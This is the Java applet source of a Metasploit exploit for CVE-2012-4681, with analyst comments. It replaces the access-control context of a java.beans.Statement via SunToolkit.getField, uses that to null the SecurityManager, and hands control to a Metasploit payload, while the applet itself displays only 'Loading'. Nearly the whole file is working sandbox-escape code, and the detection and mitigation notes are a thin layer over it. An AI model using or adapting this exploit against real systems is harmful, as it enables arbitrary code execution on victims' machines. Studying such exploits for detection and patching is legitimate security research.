GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2012-4681/Exploit.java
//
// CVE-2012-4681 Exploit - See java_jre17_exec.rb
// PoC by Joshua J. Drake: https://twitter.com/jduck1337/status/239875285913317376
// Originally reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// Oracle's Security Alert: http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
//
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
import metasploit.Payload;
/**
 * Applet proof-of-concept for CVE-2012-4681 (references are in the file header).
 *
 * <p>Reading guide for analysts: {@link #init()} is the applet entry point. It calls
 * {@link #disableSecurity()} and, if that does not throw, hands control to
 * {@code metasploit.Payload.main}, which is defined outside this file. The two
 * private helpers never call {@code Class.forName} or a reflective field lookup directly;
 * both are routed through {@code java.beans.Expression}.
 *
 * <p>Static indicators visible in this file that are usable for detection and triage:
 * an {@code Applet} subclass that combines {@code java.beans.Statement} and
 * {@code java.beans.Expression} with the string constants {@code "setSecurityManager"},
 * {@code "sun.awt.SunToolkit"}, {@code "getField"} and {@code "acc"}.
 *
 * <p>Mitigation: the vendor fix is described in Oracle's Security Alert linked in the
 * file header. NOTE(review): the patched runtime version is not named in this file;
 * take it from the advisory.
 */
public class Exploit extends Applet
{

    /** Empty constructor; all work happens in {@link #init()}. */
    public Exploit()
    {
    }

    /**
     * Executes {@code System.setSecurityManager} with a single null argument through a
     * {@code java.beans.Statement} whose {@code acc} field has been replaced by an
     * all-permission {@code AccessControlContext}.
     *
     * <p>If the call succeeds, no {@code SecurityManager} is installed afterwards, so
     * code that runs later in the same JVM is no longer subject to its checks.
     *
     * @throws Throwable anything raised while building or executing the statement;
     *         the only caller in this file, {@link #init()}, catches it
     */
    public void disableSecurity()
    throws Throwable
    {
        // new Object[1] is a one-element array holding null, i.e. the argument list (null).
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        // Protection domain for code source "file:///" with no certificates, carrying AllPermission.
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        // Overwrites the statement's "acc" field with the context built above.
        // NOTE(review): presumably "acc" is the context Statement captured at construction
        // and applies in execute(); confirm against the JDK source for the affected release.
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    /**
     * Resolves a class by name by executing {@code Class.forName(paramString)} through a
     * {@code java.beans.Expression} instead of calling it directly.
     *
     * <p>NOTE(review): the only name passed in this file is {@code "sun.awt.SunToolkit"}.
     * A direct lookup of a {@code sun.*} class from applet code is presumably rejected by
     * the package-access check, which would explain the indirection; confirm against the
     * advisory and the public analysis linked in the file header.
     *
     * @param paramString fully qualified class name
     * @return the value produced by the expression, cast to {@code Class}
     * @throws Throwable anything raised while executing the expression
     */
    private Class GetClass(String paramString)
    throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    /**
     * Sets a field on an object using a {@code Field} obtained from
     * {@code sun.awt.SunToolkit.getField(paramClass, paramString)}, invoked through a
     * {@code java.beans.Expression}.
     *
     * <p>NOTE(review): {@code Field.set} is called without {@code setAccessible}, so this
     * relies on the returned {@code Field} already being accessible. That behaviour of
     * {@code SunToolkit.getField} is an assumption here; verify it against the JDK source.
     *
     * @param paramClass class that declares the field
     * @param paramString field name
     * @param paramObject1 object whose field is written
     * @param paramObject2 value stored into the field
     * @throws Throwable anything raised by the lookup or by {@code Field.set}
     */
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
    throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    /**
     * Applet entry point: calls {@link #disableSecurity()} and then
     * {@code Payload.main(null)}.
     *
     * <p>Any {@code Throwable} is caught and only printed via {@code printStackTrace()},
     * so a failed attempt does not propagate out of this method. The stack trace it
     * prints is the only failure output this file produces.
     */
    public void init()
    {
        try
        {
            disableSecurity();
            // metasploit.Payload is project code outside this file; it is reached only
            // if disableSecurity() returned without throwing.
            Payload.main(null);
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    /**
     * Draws the text "Loading" at (50, 25); this is the only thing the applet renders.
     *
     * @param paramGraphics graphics context to draw on
     */
    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}